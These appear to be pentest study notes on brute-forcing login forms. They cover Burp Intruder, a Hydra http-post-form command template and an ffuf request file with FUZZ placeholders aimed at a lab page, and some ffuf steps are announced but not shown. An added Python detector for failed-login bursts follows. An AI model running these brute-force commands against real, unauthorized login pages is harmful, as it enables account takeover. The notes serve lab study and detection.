Authentication Attacks

Brute Force

Burp Suite

Grabbing the POST request from the HTTP history under the Proxy tab and sending it to Intruder is an easy way to manage this. You will be throttled on the Community Edition.

Hydra

hydra -l [login] -P [pass list] [target] -s [port] http-post-form "/[endpoint.ext]:[userparam]=^USER^&[passparam]=^PASS^:F=[failure string]"

FFUF

Taking the POST request from Burp Suite and saving it to a file to feed to ffuf works great, replacing the value being tested with the FUZZ operator:

POST /labs/a0x01.php HTTP/1.1
Host: 100.79.20.39
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:146.0) Gecko/20100101 Firefox/146.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
Origin: http://100.79.20.39
Connection: keep-alive
Referer: http://100.79.20.39/labs/a0x01.php
Upgrade-Insecure-Requests: 1
Priority: u=0, i

username=jeremy&password=FUZZ

Then, run ffuf using the request:

We can also use multiple FUZZ operators in our request file:

And use clusterbomb mode:
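
On the defending side, both run shapes described in this section (one username with many passwords, and clusterbomb's many usernames with many passwords) show up as a burst of failed logins from one source. The following is an added detection example, not part of the original notes; the log format, field names, threshold, window and sample lines are constructed assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

def sample_lines():
    """Constructed auth-log lines in an assumed 'ts src= user= result=' format."""
    t0 = datetime(2025, 1, 10, 12, 0, 0)
    def line(sec, src, user, result):
        ts = (t0 + timedelta(seconds=sec)).isoformat()
        return f"{ts} src={src} user={user} result={result}"
    # One username, many passwords, then a successful guess.
    out = [line(i, "203.0.113.7", "jeremy", "fail") for i in range(12)]
    out.append(line(12, "203.0.113.7", "jeremy", "ok"))
    # Many usernames x many passwords from a second source.
    users = ["jeremy", "jessamy", "admin"]
    out += [line(i, "198.51.100.9", users[i // 4], "fail") for i in range(12)]
    # A legitimate user who mistypes once.
    out += [line(20, "192.0.2.44", "alice", "fail"),
            line(25, "192.0.2.44", "alice", "ok")]
    return sorted(out)  # ISO timestamps sort chronologically

def parse(line):
    ts, *fields = line.split()
    kv = dict(f.split("=", 1) for f in fields)
    return datetime.fromisoformat(ts), kv["src"], kv["user"], kv["result"]

def detect(lines, window=timedelta(seconds=60), threshold=10):
    """Return {src: {"kind": ..., "success_after": user or None}} per alerting source."""
    recent = defaultdict(deque)  # src -> (ts, user) of failures still inside the window
    alerts = {}
    for ts, src, user, result in map(parse, lines):
        fails = recent[src]
        while fails and ts - fails[0][0] > window:
            fails.popleft()      # expire failures older than the window
        if result == "fail":
            fails.append((ts, user))
            if len(fails) >= threshold:
                distinct = {u for _, u in fails}
                kind = "single-user" if len(distinct) == 1 else "multi-user"
                alerts.setdefault(src, {"success_after": None})["kind"] = kind
        elif src in alerts:
            # A success from a source that already alerted: treat the account
            # as likely compromised and force a credential reset.
            alerts[src]["success_after"] = user
    return alerts

if __name__ == "__main__":
    for src, info in detect(sample_lines()).items():
        print(src, info)
```

A per-source window only catches bursts, so pair it with a per-account failure counter and lockout or step-up authentication.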

MFA

Things like this need to be looked at logically. Try to find any flaws in the flow.
